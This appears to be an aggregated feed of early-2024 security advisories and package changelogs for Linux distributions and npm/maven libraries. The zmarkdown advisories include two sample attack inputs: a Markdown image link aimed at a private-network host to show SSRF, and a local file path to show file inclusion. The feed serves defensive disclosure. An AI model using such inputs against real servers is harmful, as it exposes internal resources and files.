31.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0609] thunderbird security update (important)
[115.7.0-1.0.1]
- Update to 115.7.0 build1
[115.6.0-1.0.1]
- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js
[115.6.0-1]
- Update to 115.6.0 build2
[115.5.0-1]
- Update to 115.5.0 build1
[115.4.1-1]
- Update to 115.4.1 build1
[115.4.0-3]
- Update to 115.4.0 build3
[115.4.0-2]
- Update to 115.4.0 build2
[115.4.0-1]
- Update to 115.4.0 build1
[115.3.1-1]
- Update to 115.3.1 build1
[115.3.0-1]
- Update to 115.3.0
[115.2.1-5]
- Update to 115.2.1
[102.11.0-1]
- Update to 102.11.0 build1
[102.10.0-2]
- Update to 102.10.0 build2
[102.10.0-1]
- Update to 102.10.0 build1
[102.9.0-2]
- Update to 102.9.0 build1
[102.8.0-2]
- Update to 102.8.0 build2
[102.8.0-1]
- Update to 102.8.0 build1
[102.7.1-2]
- Update to 102.7.1 build2
[102.7.1-1]
- Update to 102.7.1 build1
[102.7.0-1]
- Update to 102.7.0 build1
[102.6.0-2]
- Update to 102.6.0 build2
[102.6.0-1]
- Update to 102.6.0 build1
[102.5.0-3]
- Use openssl for the librnp crypto backend to enable the openpgp encryption
[102.5.0-2]
- Update to 102.5.0 build2
[102.5.0-1]
- Update to 102.5.0 build1
[102.4.0-1]
- Update to 102.4.0 build1
[102.3.0-4]
- Fix for expat CVE-2022-40674
[102.3.0-3]
- Update to 102.3.0 build1
[91.13.0-1]
- Update to 91.13.0 build1
[91.12.0-1]
- Update to 91.12.0 build1
[91.11.0-2]
- Update to 91.11.0 build2
[91.11.0-1]
- Update to 91.11.0 build1
[91.10.0-1]
- Update to 91.10.0 build1
[91.9.1-1]
- Update to 91.9.1 build1
[91.9.0-3]
- Update to 91.9.0 build3
[91.9.0-2]
- Update to 91.9.0 build2
[91.9.0-1]
- Update to 91.9.0
[91.8.0-1]
- Update to 91.8.0
[91.7.0-2]
- Update to 91.7.0 build2
[91.7.0-1]
- Update to 91.7.0 build1
[91.6.0-2]
- Move appdata to metainfo and use stock icon instead of remote
[91.6.0-1]
- Update to 91.6.0 build1
[91.5.0-3]
- Using upstream appdata file
[91.5.0-2]
- Enabled optimalization for s390x
[91.5.0-1]
- Update to 91.5.0 build1
[91.4.0-2]
- Update to 91.4.0 build2
[91.4.0-1]
- Update to 91.4.0 build1
[91.3.0-2]
- Update to 91.3.0 build2
[91.3.0-1]
- Update to 91.3.0 build1
[91.2.0-1]
- Update to 91.2.0
[78.14.0-1]
- Update to 78.14.0
[78.13.0-2]
- Rebuilt for libffi 3.4.2 SONAME transition. Related: rhbz#1891914
[78.13.0-1]
- Update to 78.13.0
[78.12.0-4]
- Rebuilt for IMA sigs, glibc 2.34, aarch64 flags Related: rhbz#1991688
[78.12.0-3]
- Add script to process the official tarball to comply with PELC review
- Fix the build with newer glibc
[78.12.0-2]
- Update to 78.12.0 build2
[78.12.0-1]
- Update to 78.12.0 build1
[78.11.0-2]
- Added bundled libraries, update to 78.11
[78.8.0-5]
- Rebuilt for RHEL 9 BETA for openssl 3.0 Related: rhbz#1971065
[78.8.0-4]
- Rebuilt for RHEL 9 BETA on Apr 15th 2021. Related: rhbz#1947937
- Fixing MOZ_SMP_FLAGS
[78.8.0-2]
- Removed autoconf213 dependency
[78.8.0-1]
- Update to 78.8.0 build1
[78.6.1-1]
- Update to 78.6.1
[78.6.0-1]
- Update to 78.6.0
[78.5.1-1]
- Update to 78.5.1 build1
[78.5.0-1]
- Update to 78.5.0 build3
[78.4.3-1]
- Update to 78.4.3
[78.4.0-1]
- Update to 78.4.0 build1
- Disabled telemetry
[78.3.1-1]
- Update to 78.3.1 build1
[78.3.0-3]
- Update to 78.3.0 build1
- Remove librdp.so as long as we cannot ship it in RHEL
[78.2.1-1]
- Update to 78.2.1 build1
[68.12.0-1]
- Update to 68.12.0 build1
[68.11.0-1]
- Update to 68.11.0 build1
[68.10.0-1]
- Update to 68.10.0 build1
[68.9.0-1]
- Update to 68.9.0 build1
[68.8.0-1]
- Update to 68.8.0 build2
[68.7.0-1]
- Update to 68.7.0 build1
[68.6.0-1]
- Update to 68.6.0 build2
[68.5.0-1]
- Update to 68.5.0 build1
[68.4.1-2]
- Update to 68.4.1 build1
[68.3.0-2]
- Update to 68.3.0 build2
[68.2.0-2]
- Added patch for TLS 1.3 support.
[68.2.0-1]
- Update to 68.2.0
[68.1.1-2]
- Update to 68.1.1
[60.9.0-2]
- Update to 60.9.0
[60.8.0-1]
- Updated to 60.8.0
[60.7.2-3]
- Rebuild to fix rhbz#1725919 - Thunderbird fails to authenticate with gmail with ssl/tls and OAuth2.
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0609

31.01.2024 02:00:00 | redhat | [RHSA-2024:0629] tigervnc security update (important)
Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.
Security Fix(es):
* xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer (CVE-2023-6816)
* xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229)
* xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885)
* xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0629

31.01.2024 12:16:15 | almalinux | [ALSA-2024:0606] openssh security update (moderate)
openssh security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0606

31.01.2024 12:11:00 | almalinux | [ALSA-2024:0607] tigervnc security update (important)
tigervnc security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0607

31.01.2024 13:00:39 | almalinux | [ALSA-2024:0557] tigervnc security update (important)
tigervnc security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0557

01.02.2024 00:39:01 | maven | [MAVEN:GHSA-8J3X-W35R-RW4R] Quarkus Improper Handling of Insufficient Permissions or Privileges and Improper Handling of Exceptional Conditions vulnerability (high)
A flaw was found in the json payload. If annotation based security is used to secure a REST resource, the JSON body that the resource may consume is being processed (deserialized) prior to the security constraints being evaluated and applied. This does not happen with configuration based security.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8J3X-W35R-RW4R

01.02.2024 21:55:43 | msrc | [MS:CVE-2024-1077] Chromium: CVE-2024-1077 Use after free in Network
https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1077

01.02.2024 21:55:41 | msrc | [MS:CVE-2024-1059] Chromium: CVE-2024-1059 Use after free in WebRTC
https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1059

01.02.2024 21:55:37 | msrc | [MS:CVE-2024-1060] Chromium: CVE-2024-1060 Use after free in Canvas
https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1060

01.02.2024 19:45:01 | ubuntu | [USN-6621-1] ImageMagick vulnerability (medium)
ImageMagick could be made to crash if it opened a specially crafted file.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6621-1

01.02.2024 15:22:21 | ubuntu | [USN-6587-4] X.Org X Server regression
A regression was fixed in X.Org X Server.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6587-4

01.02.2024 14:41:59 | ubuntu | [USN-6620-1] GNU C Library vulnerabilities (high)
GNU C Library could be made to crash or run programs as an administrator if it handled a specially crafted request.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6620-1

01.02.2024 10:00:00 | msrc | [MS:CVE-2024-21399] Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability (moderate)
https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21399

01.02.2024 02:00:00 | debian | [DSA-5613-1] openjdk-17 (high)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5613-1

01.02.2024 02:00:00 | debian | [DSA-5612-1] chromium
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5612-1

01.02.2024 02:00:00 | oraclelinux | [ELSA-2024-0606] openssh security update (moderate)
[8.0p1-19.2]
- Forbid shell metasymbols in username/hostname Resolves: CVE-2023-51385
- Fix Terrapin attack Resolves: CVE-2023-48795
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0606

01.02.2024 02:00:00 | oraclelinux | [ELSA-2024-0628] libssh security update (moderate)
[0.9.6-13]
- Client and Server side mitigations (CVE-2023-48795)
- Strip extensions from both kex lists for matching (CVE-2023-48795)
- tests: Adjust calculation to strict kex (CVE-2023-48795)
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0628

01.02.2024 02:00:00 | oraclelinux | [ELSA-2024-0647] rpm security update (moderate)
[4.14.3-28.0.1]
- Fixed infinite loop for db_create with error check [Orabug: 36202920]
[4.14.3-28]
- Backport file handling code from rpm-4.19 to fix CVE-2021-35937, CVE-2021-35938 and CVE-2021-35939
[4.14.3-27]
- Make brp-python-bytecompile script compatible with Python 3.10+
Resolves: RHEL-6423
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0647

01.02.2024 02:00:00 | redhat | [RHSA-2024:0647] rpm security update (moderate)
The RPM Package Manager (RPM) is a command-line driven package management system capable of installing, uninstalling, verifying, querying, and updating software packages.
Security Fix(es):
* rpm: TOCTOU race in checks for unsafe symlinks (CVE-2021-35937)
* rpm: races with chown/chmod/capabilities calls during installation (CVE-2021-35938)
* rpm: checks for unsafe symlinks are not performed for intermediary directories (CVE-2021-35939)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0647

01.02.2024 02:00:00 | oraclelinux | [ELSA-2024-0629] tigervnc security update (important)
[1.8.0-31.0.1]
- Dropped xorg-CVE-2023-5367.patch, xorg-CVE-2023-6816.patch, xorg-CVE-2023-6377.patch, xorg-CVE-2023-6478.patch, xorg-CVE-2024-0229-1.patch, xorg-CVE-2024-0229-2.patch, xorg-CVE-2024-0229-3.patch, xorg-CVE-2024-21885.patch, xorg-CVE-2024-21886-1.patch, xorg-CVE-2024-21886-2.patch, xorg-dix-fix-use-after-free-in-input-device-shutdown.patch
[1.8.0-31]
- Fix use after free related to CVE-2024-21886 Resolves: RHEL-20436
- Fix copy/paste error in the DeviceStateNotify Resolves: RHEL-20587
[1.8.0-30]
- Don't try to get pointer position when the pointer becomes a floating device Resolves: RHEL-20436
[1.8.0-29]
- Fix CVE-2024-21886 tigervnc: xorg-x11-server: heap buffer overflow in DisableDevice Resolves: RHEL-20436
- Fix CVE-2024-21885 tigervnc: xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent Resolves: RHEL-20427
- Fix CVE-2024-0229 tigervnc: xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access Resolves: RHEL-20587
- Fix CVE-2023-6816 tigervnc: xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer Resolves: RHEL-21212
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0629

01.02.2024 11:02:43 | almalinux | [ALSA-2024:0628] libssh security update (moderate)
libssh security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0628

01.02.2024 11:14:27 | almalinux | [ALSA-2024:0627] gnutls security update (moderate)
gnutls security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0627

01.02.2024 11:44:40 | almalinux | [ALSA-2024:0609] thunderbird security update (important)
thunderbird security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0609

01.02.2024 11:58:53 | almalinux | [ALSA-2024:0608] firefox security update (important)
firefox security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0608

01.02.2024 12:06:48 | almalinux | [ALSA-2024:0603] firefox security update (important)
firefox security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0603

01.02.2024 12:12:30 | almalinux | [ALSA-2024:0602] thunderbird security update (important)
thunderbird security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0602

03.02.2024 02:38:23 | npm | [NPM:GHSA-MF74-QQ7W-6J7V] Zmarkdown Server-Side Request Forgery (SSRF) in remark-download-images (moderate)
### Impact
A major blind SSRF has been found in `remark-images-download`, which allowed requests to be made to neighboring servers on local IP ranges. The issue came from loose filtering of URLs inside the module.
Imagine a server running on a private network `192.168.1.0/24`. A private service serving images is running on `192.168.1.2`, and is not expected to be accessed by users. A machine is running `remark-images-download` on the neighboring `192.168.1.3` host. A user enters the following Markdown:
```markdown
![](http://192.168.1.2/private-img.png)
```
The image is downloaded by the server and included inside the resulting document. Hence, the user has access to the private image.
It has been corrected by preventing image downloads from local IP ranges, both in IPv4 and IPv6. To guard against malicious domain names, domain names that resolve to local IPs are also forbidden inside the module.
This vulnerability's impact is moderate, as it can allow access to unexposed documents on the local network, and it is very easy to exploit.
### Patches
The vulnerability has been patched in version 3.1.0. If impacted, you should update to this version as soon as possible.
Please note that a minor version has been released instead of a bugfix. This is due to a new option included to prevent another vulnerability; upgrading to the new version will not break compatibility.
### Workarounds
No workaround is known; the package should be upgraded.
### For more information
If you have any questions or comments about this advisory, open an issue in [ZMarkdown](https://github.com/zestedesavoir/zmarkdown/issues).
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MF74-QQ7W-6J7V

03.02.2024 02:37:56 | npm | [NPM:GHSA-MQ6V-W35G-3C97] Local File Inclusion vulnerability in zmarkdown (low)
### Impact
A minor Local File Inclusion vulnerability has been found in `zmarkdown`, which allowed images with a known path on the host machine to be included inside a LaTeX document.
To prevent it, a new option has been created that allows replacing invalid paths with a default image instead of linking the image on the host directly. `zmarkdown` has been updated to make this setting the default.
Every user of `zmarkdown` is likely impacted, except if LaTeX generation or image download is disabled. Here is an example of including an image from an invalid path:
```markdown
![](/tmp/img.png)
```
This will effectively redownload and include the image found at `/tmp/img.png`.
### Patches
The vulnerability has been patched in version 10.1.3. If impacted, you should update to this version as soon as possible.
### Workarounds
Disable image downloading, or sanitize paths.
### For more information
If you have any questions or comments about this advisory, open an issue in [ZMarkdown](https://github.com/zestedesavoir/zmarkdown/issues).
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MQ6V-W35G-3C97

02.02.2024 22:17:32 | npm | [NPM:GHSA-V269-RRR6-CX6R] Ylianst MeshCentral 1.1.16 suffers from Use of a Broken or Risky Cryptographic Algorithm. (moderate)
Ylianst MeshCentral 1.1.16 suffers from Use of a Broken or Risky Cryptographic Algorithm.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-V269-RRR6-CX6R

02.02.2024 22:59:10 | maven | [MAVEN:GHSA-2MRQ-W8PV-5PVQ] Malicious input can provoke XSS when preserving comments (moderate)
# Impact
There is a potential for a mutation XSS (mXSS) vulnerability in AntiSamy caused by flawed parsing of the HTML being sanitized. To be subject to this vulnerability the `preserveComments` directive must be enabled in your policy file. As a result, certain crafty inputs can result in elements in comment tags being interpreted as executable when using AntiSamy's sanitized output.
# Patches
Patched in AntiSamy 1.7.5 and later. This is due to parsing behavior in the [neko-htmlunit](https://github.com/HtmlUnit/htmlunit-neko) dependency; just by updating to a newer version the issue was solved. See important remediation details in the reference given below.
# Workarounds
If you cannot upgrade to a fixed version of the library, the following mitigation can be applied until you can upgrade: Manually edit your AntiSamy policy file (e.g., antisamy.xml) by deleting the `preserveComments` directive or setting its value to `false`, if present.
As the previously mentioned policy settings are preconditions for the mXSS attack to work, changing them as recommended should be sufficient to protect you against this vulnerability when using a vulnerable version of this library. However, the existing bug would still be present in the parser dependency (neko-htmlunit) and therefore in AntiSamy. The safety of this workaround relies on configurations that may change in the future and doesn't address the root cause of the vulnerability. As such, it is strongly recommended to upgrade to a fixed version of AntiSamy.
# For more information
If you have any questions or comments about this advisory: Email one of the project co-leaders, listed on the [OWASP AntiSamy project](https://owasp.org/www-project-antisamy/) page, under "Leaders".
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2MRQ-W8PV-5PVQ

02.02.2024 18:55:27 | maven | [MAVEN:GHSA-34Q3-P352-C7Q8] Central Dogma Authentication Bypass Vulnerability via Session Leakage (critical)
### Vulnerability Overview
A vulnerability has been identified in Central Dogma versions prior to 0.64.0, allowing for the leakage of user sessions and subsequent authentication bypass. The issue stems from a Cross-Site Scripting (XSS) attack vector that targets the RelayState of Security Assertion Markup Language (SAML).
### Impact
Successful exploitation of this vulnerability enables malicious actors to leak user sessions, leading to the compromise of authentication mechanisms. This, in turn, can facilitate unauthorized access to sensitive resources.
### Patches
This vulnerability is addressed and resolved in Central Dogma version 0.64.0. Users are strongly encouraged to upgrade to this version or later to mitigate the risk associated with the authentication bypass.
### Workarounds
No viable workarounds are currently available for this vulnerability. It is recommended to apply the provided patch promptly.
### References
- [OASIS SAML v2.0 Errata 05](https://docs.oasis-open.org/security/saml/v2.0/errata05/os/saml-v2.0-errata05-os.html#__RefHeading__8196_1983180497)
- [OWASP XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#xss-defense-philosophy)
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-34Q3-P352-C7Q8

02.02.2024 18:55:22 | maven | [MAVEN:GHSA-QFV2-3P2F-VG48] Duplicate Advisory: Central Dogma Authentication Bypass Vulnerability via Session Leakage (moderate)
## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-34q3-p352-c7q8. This link is maintained to preserve external references.
## Original Description
Central Dogma versions prior to 0.64.0 are vulnerable to Cross-Site Scripting (XSS), which could allow for the leakage of user sessions and subsequent authentication bypass.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QFV2-3P2F-VG48

02.02.2024 20:10:52 | npm | [NPM:GHSA-547X-748V-VP6P] Dash apps vulnerable to Cross-site Scripting (moderate)
Versions of the package dash-core-components before 2.13.0; all versions of the package dash-core-components; versions of the package dash before 2.15.0; all versions of the package dash-html-components; versions of the package dash-html-components before 2.0.16 are vulnerable to Cross-site Scripting (XSS) when the href of the a tag is controlled by an adversary. An authenticated attacker who stores a view that exploits this vulnerability could steal the data that's visible to another user who opens that view - not just the data already included on the page, but they could also, in theory, make additional requests and access other data accessible to this user. In some cases, they could also steal the access tokens of that user, which would allow the attacker to act as that user, including viewing other apps and resources hosted on the same server.
**Note:** This is only exploitable in Dash apps that include some mechanism to store user input to be reloaded by a different user.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-547X-748V-VP6P

02.02.2024 20:10:31 maven [MAVEN:GHSA-9GH8-877R-G477] Beetl Server-Side Template Injection vulnerability (moderate)
Before Beetl v3.15.12, the rendering template has a server-side template injection (SSTI) vulnerability. When the incoming template is controllable, it will be filtered by the DefaultNativeSecurityManager blacklist. Because blacklist filtering is not strict, the blacklist can be bypassed, leading to arbitrary code execution.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9GH8-877R-G477

02.02.2024 02:00:00 gentoo [GLSA-202402-01] glibc: Multiple Vulnerabilities (high)
Multiple vulnerabilities in glibc could result in Local Privilege Escalation.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-01

02.02.2024 02:00:00 oraclelinux [ELSA-2024-0627] gnutls security update (moderate)
[3.6.16-8.1]
- auth/rsa-psk: minimize branching after decryption (RHEL-21550)
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0627

02.02.2024 02:00:00 oraclelinux [ELSA-2024-0647] rpm security update (moderate)
[4.14.3-28.0.2]
- Import additional patches to fix regressions with CVE-2021-35937, CVE-2021-35938 and CVE-2021-35939 patchset [Orabug: 36256318]
[4.14.3-28.0.1]
- Fixed infinite loop for db_create with error check [Orabug: 36202920]
[4.14.3-28]
- Backport file handling code from rpm-4.19 to fix CVE-2021-35937, CVE-2021-35938 and CVE-2021-35939
[4.14.3-27]
- Make brp-python-bytecompile script compatible with Python 3.10+
  Resolves: RHEL-6423
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0647

02.02.2024 02:00:00 freebsd [FREEBSD:DC9E5237-C197-11EE-86BB-A8A1599412C6] chromium -- multiple security fixes
Chrome Releases reports:
This update includes 4 security fixes:
- [1511567] High CVE-2024-1060: Use after free in Canvas. Reported by Anonymous on 2023-12-14
- [1514777] High CVE-2024-1059: Use after free in WebRTC. Reported by Cassidy Kim(@cassidy6564) on 2023-12-29
- [1511085] High CVE-2024-1077: Use after free in Network. Reported by Microsoft Security Research Center on 2023-12-13
https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:DC9E5237-C197-11EE-86BB-A8A1599412C6

03.02.2024 16:15:50 alpinelinux [ALPINE:CVE-2024-0853] curl vulnerability
[From CVE-2024-0853] curl inadvertently kept the SSL session ID for connections in its cache even when the verify status (*OCSP stapling*) test failed. A subsequent transfer to the same hostname could then succeed if the session ID cache was still fresh, which then skipped the verify status check.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-0853

04.02.2024 21:43:16 slackware [SSA:2024-035-01] libxml2

New libxml2 packages are available for Slackware 15.0 and -current to fix a security issue.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/libxml2-2.11.7-i586-1_slack15.0.txz: Upgraded.
  Fix the following security issue:
  xmlreader: Don't expand XIncludes when backtracking.
  For more information, see:
    https://www.cve.org/CVERecord?id=CVE-2024-25062
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libxml2-2.11.7-i586-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libxml2-2.11.7-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libxml2-2.12.5-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libxml2-2.12.5-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
62a4fe8efaa414b80d9ed26e328512d9  libxml2-2.11.7-i586-1_slack15.0.txz

Slackware x86_64 15.0 package:
7f95acd6df018ee2407c2648e43265dc  libxml2-2.11.7-x86_64-1_slack15.0.txz

Slackware -current package:
a8bb1185c13a7a2c0ce44808a65eb2d5  l/libxml2-2.12.5-i586-1.txz

Slackware x86_64 -current package:
5b38dd33b4986251180ac7ce051d31b6  l/libxml2-2.12.5-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg libxml2-2.11.7-i586-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-035-01

04.02.2024 02:00:00 debian [DSA-5615-1] runc (high)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5615-1

04.02.2024 02:00:00 gentoo [GLSA-202402-07] Xen: Multiple Vulnerabilities (high)
Multiple vulnerabilities have been found in Xen, the worst of which can lead to arbitrary code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-07

04.02.2024 02:00:00 gentoo [GLSA-202402-09] Wireshark: Multiple Vulnerabilities (low)
Multiple out-of-bounds read vulnerabilities have been discovered in Wireshark.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-09

04.02.2024 02:00:00 gentoo [GLSA-202402-08] OpenSSL: Multiple Vulnerabilities (normal)
Multiple vulnerabilities have been found in OpenSSL, the worst of which could result in denial of service.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-08

04.02.2024 02:00:00 gentoo [GLSA-202402-10] NBD Tools: Multiple Vulnerabilities (normal)
Multiple vulnerabilities have been found in NBD Tools, the worst of which could result in arbitrary code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-10

06.02.2024 00:34:11 maven [MAVEN:GHSA-7QW4-9R68-2RMX] mingSoft MCMS File Upload vulnerability (high)
File Upload vulnerability in MCMS 5.3.5 allows attackers to upload arbitrary files via crafted POST request to /ms/file/upload.do.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7QW4-9R68-2RMX

06.02.2024 00:58:57 npm [NPM:GHSA-9M6M-C64R-W4F4] Stimulsoft Dashboard.JS Cross Site Scripting vulnerability (moderate)
Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the search bar component.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9M6M-C64R-W4F4

06.02.2024 00:33:49 npm [NPM:GHSA-9CGF-PXWQ-2CPW] Stimulsoft Dashboard.JS Cross Site Scripting vulnerability (moderate)
Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the ReportName field.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9CGF-PXWQ-2CPW

05.02.2024 02:00:00 debian [DSA-5616-1] ruby-sanitize
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5616-1

05.02.2024 02:00:00 oraclelinux [ELSA-2024-0670] runc security update (important)
[4:1.1.12-1]
- update to https://github.com/opencontainers/runc/releases/tag/v1.1.12
- Related: RHEL-2112
[4:1.1.11-1]
- update to https://github.com/opencontainers/runc/releases/tag/v1.1.11
- Related: RHEL-2112
[4:1.1.10-3]
- Rebuild for CVEs: CVE-2023-39321 CVE-2023-39322 CVE-2023-29409
- Related: Jira:RHEL-2792
- Related: Jira:RHEL-7454
[4:1.1.10-2]
- require container-selinux >= 2.224.0 for dmz feature
- Related: Jira:RHEL-2112
[4:1.1.10-1]
- update to https://github.com/opencontainers/runc/releases/tag/v1.1.10
- Related: RHEL-2112
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0670

05.02.2024 02:00:00 oraclelinux [ELSA-2024-12135] gnutls security update (moderate)
[3.6.16-8.1_fips]
- Allow RSA keygen with modulus sizes bigger than 3072 bits and validate the seed length as defined in FIPS 186-4 section B.3.2 [Orabug: 33200526]
- Allow bigger known RSA modulus sizes when calling rsa_generate_fips186_4_keypair directly [Orabug: 33200526]
- Change Epoch from 1 to 10
[3.6.16-8.1]
- auth/rsa-psk: minimize branching after decryption (RHEL-21550)
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12135

05.02.2024 22:20:30 npm [NPM:GHSA-MPWJ-FCR6-X34C] Yarn untrusted search path vulnerability (high)
An untrusted search path vulnerability was found in Yarn. When a victim runs certain Yarn commands in a directory with attacker-controlled content, malicious commands could be executed in unexpected ways.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MPWJ-FCR6-X34C

05.02.2024 22:55:24 rubysec [RUBYSEC:NOKOGIRI-XC9X-JJ77-9P9J] Improper Handling of Unexpected Data Type in Nokogiri

### Summary

Nokogiri v1.16.2 upgrades the version of its dependency libxml2 to v2.12.5.

libxml2 v2.12.5 addresses the following vulnerability:

CVE-2024-25062 / https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25062
described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/604
patched by https://gitlab.gnome.org/GNOME/libxml2/-/commit/92721970

Please note that this advisory only applies to the CRuby implementation of Nokogiri < 1.16.2, and only if the packaged libraries are being used. If you've overridden defaults at installation time to use system libraries instead of packaged libraries, you should instead pay attention to your distro's libxml2 release announcements.

### Severity

The Nokogiri maintainers have evaluated this as **Moderate**.

### Mitigation

Upgrade to Nokogiri >= 1.16.2.

Users who are unable to upgrade Nokogiri may also choose a more complicated mitigation: compile and link Nokogiri against external libraries libxml2 >= 2.12.5 which will also address these same issues.

JRuby users are not affected.

### Workarounds

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:NOKOGIRI-XC9X-JJ77-9P9J

06.02.2024 20:24:33 maven [MAVEN:GHSA-H2RQ-QHR7-53GM] Apache Sling Servlets Resolver executes malicious code via path traversal (high)

Malicious code execution via path traversal in Apache Software Foundation Apache Sling Servlets Resolver.

This issue affects all versions of Apache Sling Servlets Resolver before 2.11.0. However, whether a system is vulnerable to this attack depends on the exact configuration of the system.

If the system is vulnerable, a user with write access to the repository might be able to trick the Sling Servlet Resolver to load a previously uploaded script. Users are recommended to upgrade to version 2.11.0, which fixes this issue. It is recommended to upgrade, regardless of whether your system configuration currently allows this attack or not.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H2RQ-QHR7-53GM

06.02.2024 11:15:52 alpinelinux [ALPINE:CVE-2024-0684] coreutils vulnerability
[From CVE-2024-0684] A flaw was found in the GNU coreutils "split" program. A heap overflow with user-controlled data of multiple hundred bytes in length could occur in the line_bytes_split() function, potentially leading to an application crash and denial of service.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-0684

06.02.2024 20:23:20 npm [NPM:GHSA-GFQF-9W98-7JMX] Stimulsoft Dashboard.JS directory traversal vulnerability (critical)
Directory Traversal vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.3 allows a remote attacker to execute arbitrary code via a crafted payload to the fileName parameter of the Save function.
